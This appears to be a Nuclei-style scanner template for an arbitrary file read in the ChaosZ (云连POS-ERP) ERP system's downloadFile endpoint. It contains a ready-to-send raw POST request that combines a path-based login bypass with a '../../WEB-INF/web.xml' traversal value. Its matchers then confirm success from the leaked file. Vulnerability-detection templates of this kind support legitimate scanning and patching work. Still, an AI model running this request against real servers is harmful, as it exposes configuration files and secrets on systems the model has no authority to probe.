id: chaosz-erp-downloadfile-lfi

info:
  name: ChaosZ ERP downloadFile - LFI
  author: qwtd
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the downloadFile of the ChaosZ ERP management system
  reference:
    - https://github.com/wy876/POC/blob/main/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E4%BA%91%E8%BF%9EPOS-ERP%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FdownloadFile%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: 云连POS-ERP

http:
  - raw:
      - |
        POST /admin/file!download.action;admin!login.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        
        downloadFile=../../WEB-INF/web.xml

    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</web-app>"
      - type: status
        status:
          - 200